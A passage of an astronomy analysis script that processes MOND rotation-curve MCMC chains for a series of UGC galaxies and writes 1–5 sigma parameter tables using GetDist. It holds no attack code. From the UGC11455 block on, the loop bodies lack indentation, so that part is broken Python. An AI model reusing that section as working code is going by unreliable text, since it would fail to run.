        low = df2_sol_UGC09037 - stats_UGC09037.parWithName('df2').limits[i].lower
        up = stats_UGC09037.parWithName('df2').limits[i].upper - df2_sol_UGC09037
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC09037, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC09037 - stats_UGC09037.parWithName('Dinc').limits[i].lower
        up = stats_UGC09037.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC09037
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC09037, low, up))
full_chain_UGC09133 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC09133.csv', usecols=[1, 2, 3, 4, 5])
data_array_chain_UGC09133 = numpy.array(full_chain_UGC09133)
mle_soln_UGC09133 = []
for i in range(ndim_with_bulge):
    mcmc_UGC09133 = numpy.percentile(data_array_chain_UGC09133[:, i], [16, 50, 84])
    q_UGC09133 = numpy.diff(mcmc_UGC09133)
    mle_soln_UGC09133.append(mcmc_UGC09133[1])
log10_a0_sol_UGC09133 = mle_soln_UGC09133[0]
log10_YD_sol_UGC09133 = mle_soln_UGC09133[1]
log10_YB_sol_UGC09133 = mle_soln_UGC09133[2]
df2_sol_UGC09133 = mle_soln_UGC09133[3]
Dinc_sol_UGC09133 = mle_soln_UGC09133[4]
samp_UGC09133 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC09133, names=names_with_bulge, labels=labels_with_bulge)
samp_UGC09133.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC09133 = samp_UGC09133.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC09133 - stats_UGC09133.parWithName('log10_a0').limits[i].lower
        up = stats_UGC09133.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC09133
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC09133, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC09133 - stats_UGC09133.parWithName('log10_YD').limits[i].lower
        up = stats_UGC09133.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC09133
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC09133, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_YB.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YB_sol_UGC09133 - stats_UGC09133.parWithName('log10_YB').limits[i].lower
        up = stats_UGC09133.parWithName('log10_YB').limits[i].upper - log10_YB_sol_UGC09133
        text_file.write('%s,%s,%s\n' % (log10_YB_sol_UGC09133, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = df2_sol_UGC09133 - stats_UGC09133.parWithName('df2').limits[i].lower
        up = stats_UGC09133.parWithName('df2').limits[i].upper - df2_sol_UGC09133
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC09133, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC09133 - stats_UGC09133.parWithName('Dinc').limits[i].lower
        up = stats_UGC09133.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC09133
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC09133, low, up))
full_chain_UGC09992 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC09992.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC09992 = numpy.array(full_chain_UGC09992)
mle_soln_UGC09992 = []
for i in range(ndim):
    mcmc_UGC09992 = numpy.percentile(data_array_chain_UGC09992[:, i], [16, 50, 84])
    q_UGC09992 = numpy.diff(mcmc_UGC09992)
    mle_soln_UGC09992.append(mcmc_UGC09992[1])
log10_a0_sol_UGC09992 = mle_soln_UGC09992[0]
log10_YD_sol_UGC09992 = mle_soln_UGC09992[1]
df2_sol_UGC09992 = mle_soln_UGC09992[2]
Dinc_sol_UGC09992 = mle_soln_UGC09992[3]
samp_UGC09992 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC09992, names=names, labels=labels)
samp_UGC09992.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC09992 = samp_UGC09992.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC09992 - stats_UGC09992.parWithName('log10_a0').limits[i].lower
        up = stats_UGC09992.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC09992
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC09992, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC09992 - stats_UGC09992.parWithName('log10_YD').limits[i].lower
        up = stats_UGC09992.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC09992
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC09992, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = df2_sol_UGC09992 - stats_UGC09992.parWithName('df2').limits[i].lower
        up = stats_UGC09992.parWithName('df2').limits[i].upper - df2_sol_UGC09992
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC09992, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC09992 - stats_UGC09992.parWithName('Dinc').limits[i].lower
        up = stats_UGC09992.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC09992
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC09992, low, up))
full_chain_UGC10310 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC10310.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC10310 = numpy.array(full_chain_UGC10310)
mle_soln_UGC10310 = []
for i in range(ndim):
    mcmc_UGC10310 = numpy.percentile(data_array_chain_UGC10310[:, i], [16, 50, 84])
    q_UGC10310 = numpy.diff(mcmc_UGC10310)
    mle_soln_UGC10310.append(mcmc_UGC10310[1])
log10_a0_sol_UGC10310 = mle_soln_UGC10310[0]
log10_YD_sol_UGC10310 = mle_soln_UGC10310[1]
df2_sol_UGC10310 = mle_soln_UGC10310[2]
Dinc_sol_UGC10310 = mle_soln_UGC10310[3]
samp_UGC10310 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC10310, names=names, labels=labels)
samp_UGC10310.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC10310 = samp_UGC10310.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC10310 - stats_UGC10310.parWithName('log10_a0').limits[i].lower
        up = stats_UGC10310.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC10310
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC10310, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC10310 - stats_UGC10310.parWithName('log10_YD').limits[i].lower
        up = stats_UGC10310.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC10310
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC10310, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = df2_sol_UGC10310 - stats_UGC10310.parWithName('df2').limits[i].lower
        up = stats_UGC10310.parWithName('df2').limits[i].upper - df2_sol_UGC10310
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC10310, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC10310 - stats_UGC10310.parWithName('Dinc').limits[i].lower
        up = stats_UGC10310.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC10310
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC10310, low, up))
full_chain_UGC11455 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC11455.csv',usecols=[1,2,3,4])
data_array_chain_UGC11455 = numpy.array(full_chain_UGC11455)
mle_soln_UGC11455=[]
for i in range(ndim):
mcmc_UGC11455 = numpy.percentile(data_array_chain_UGC11455[:, i], [16, 50, 84])
q_UGC11455 = numpy.diff(mcmc_UGC11455)
mle_soln_UGC11455.append(mcmc_UGC11455[1])
log10_a0_sol_UGC11455=mle_soln_UGC11455[0]
log10_YD_sol_UGC11455=mle_soln_UGC11455[1]
df2_sol_UGC11455=mle_soln_UGC11455[2]
Dinc_sol_UGC11455=mle_soln_UGC11455[3]
samp_UGC11455 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC11455,names = names, labels = labels)
samp_UGC11455.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC11455 = samp_UGC11455.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC11455
low=log10_a0_sol_UGC11455-stats_UGC11455.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC11455.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC11455
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC11455
low=log10_YD_sol_UGC11455-stats_UGC11455.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC11455.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC11455
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC11455
low=df2_sol_UGC11455-stats_UGC11455.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC11455.parWithName('df2').limits[i].upper- df2_sol_UGC11455
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC11455
low=Dinc_sol_UGC11455-stats_UGC11455.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC11455.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC11455
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC11557 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC11557.csv',usecols=[1,2,3,4])
data_array_chain_UGC11557 = numpy.array(full_chain_UGC11557)
mle_soln_UGC11557=[]
for i in range(ndim):
mcmc_UGC11557 = numpy.percentile(data_array_chain_UGC11557[:, i], [16, 50, 84])
q_UGC11557 = numpy.diff(mcmc_UGC11557)
mle_soln_UGC11557.append(mcmc_UGC11557[1])
log10_a0_sol_UGC11557=mle_soln_UGC11557[0]
log10_YD_sol_UGC11557=mle_soln_UGC11557[1]
df2_sol_UGC11557=mle_soln_UGC11557[2]
Dinc_sol_UGC11557=mle_soln_UGC11557[3]
samp_UGC11557 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC11557,names = names, labels = labels)
samp_UGC11557.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC11557 = samp_UGC11557.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC11557
low=log10_a0_sol_UGC11557-stats_UGC11557.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC11557.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC11557
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC11557
low=log10_YD_sol_UGC11557-stats_UGC11557.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC11557.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC11557
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC11557
low=df2_sol_UGC11557-stats_UGC11557.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC11557.parWithName('df2').limits[i].upper- df2_sol_UGC11557
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC11557
low=Dinc_sol_UGC11557-stats_UGC11557.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC11557.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC11557
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC11820 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC11820.csv',usecols=[1,2,3,4])
data_array_chain_UGC11820 = numpy.array(full_chain_UGC11820)
mle_soln_UGC11820=[]
for i in range(ndim):
mcmc_UGC11820 = numpy.percentile(data_array_chain_UGC11820[:, i], [16, 50, 84])
q_UGC11820 = numpy.diff(mcmc_UGC11820)
mle_soln_UGC11820.append(mcmc_UGC11820[1])
log10_a0_sol_UGC11820=mle_soln_UGC11820[0]
log10_YD_sol_UGC11820=mle_soln_UGC11820[1]
df2_sol_UGC11820=mle_soln_UGC11820[2]
Dinc_sol_UGC11820=mle_soln_UGC11820[3]
samp_UGC11820 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC11820,names = names, labels = labels)
samp_UGC11820.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC11820 = samp_UGC11820.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC11820
low=log10_a0_sol_UGC11820-stats_UGC11820.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC11820.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC11820
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC11820
low=log10_YD_sol_UGC11820-stats_UGC11820.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC11820.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC11820
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC11820
low=df2_sol_UGC11820-stats_UGC11820.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC11820.parWithName('df2').limits[i].upper- df2_sol_UGC11820
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC11820
low=Dinc_sol_UGC11820-stats_UGC11820.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC11820.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC11820
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC11914 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC11914.csv',usecols=[1,2,3,4,5])
data_array_chain_UGC11914 = numpy.array(full_chain_UGC11914)
mle_soln_UGC11914=[]
for i in range(ndim_with_bulge):
mcmc_UGC11914 = numpy.percentile(data_array_chain_UGC11914[:, i], [16, 50, 84])
q_UGC11914 = numpy.diff(mcmc_UGC11914)
mle_soln_UGC11914.append(mcmc_UGC11914[1])
log10_a0_sol_UGC11914=mle_soln_UGC11914[0]
log10_YD_sol_UGC11914=mle_soln_UGC11914[1]
log10_YB_sol_UGC11914=mle_soln_UGC11914[2]
df2_sol_UGC11914=mle_soln_UGC11914[3]
Dinc_sol_UGC11914=mle_soln_UGC11914[4]
samp_UGC11914 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC11914,names = names_with_bulge, labels = labels_with_bulge)
samp_UGC11914.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC11914 = samp_UGC11914.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC11914
low=log10_a0_sol_UGC11914-stats_UGC11914.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC11914
low=log10_YD_sol_UGC11914-stats_UGC11914.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_YB.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YB_sol_str='%s'%log10_YB_sol_UGC11914
low=log10_YB_sol_UGC11914-stats_UGC11914.parWithName('log10_YB').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('log10_YB').limits[i].upper- log10_YB_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_YB.txt', 'a')
text_file.write(log10_YB_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC11914
low=df2_sol_UGC11914-stats_UGC11914.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('df2').limits[i].upper- df2_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC11914
low=Dinc_sol_UGC11914-stats_UGC11914.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC12506 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC12506.csv',usecols=[1,2,3,4])
data_array_chain_UGC12506 = numpy.array(full_chain_UGC12506)
mle_soln_UGC12506=[]
for i in range(ndim):
mcmc_UGC12506 = numpy.percentile(data_array_chain_UGC12506[:, i], [16, 50, 84])
q_UGC12506 = numpy.diff(mcmc_UGC12506)
mle_soln_UGC12506.append(mcmc_UGC12506[1])
log10_a0_sol_UGC12506=mle_soln_UGC12506[0]
log10_YD_sol_UGC12506=mle_soln_UGC12506[1]
df2_sol_UGC12506=mle_soln_UGC12506[2]
Dinc_sol_UGC12506=mle_soln_UGC12506[3]
samp_UGC12506 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC12506,names = names, labels = labels)
samp_UGC12506.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC12506 = samp_UGC12506.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC12506
low=log10_a0_sol_UGC12506-stats_UGC12506.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC12506.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC12506
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC12506
low=log10_YD_sol_UGC12506-stats_UGC12506.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC12506.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC12506
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC12506
low=df2_sol_UGC12506-stats_UGC12506.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC12506.parWithName('df2').limits[i].upper- df2_sol_UGC12506
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC12506
low=Dinc_sol_UGC12506-stats_UGC12506.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC12506.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC12506
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC12632 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC12632.csv',usecols=[1,2,3,4])
data_array_chain_UGC12632 = numpy.array(full_chain_UGC12632)
mle_soln_UGC12632=[]
for i in range(ndim):
mcmc_UGC12632 = numpy.percentile(data_array_chain_UGC12632[:, i], [16, 50, 84])
q_UGC12632 = numpy.diff(mcmc_UGC12632)
mle_soln_UGC12632.append(mcmc_UGC12632[1])
log10_a0_sol_UGC12632=mle_soln_UGC12632[0]
log10_YD_sol_UGC12632=mle_soln_UGC12632[1]
df2_sol_UGC12632=mle_soln_UGC12632[2]
Dinc_sol_UGC12632=mle_soln_UGC12632[3]
samp_UGC12632 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC12632,names = names, labels = labels)
samp_UGC12632.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC12632 = samp_UGC12632.getMargeStats()
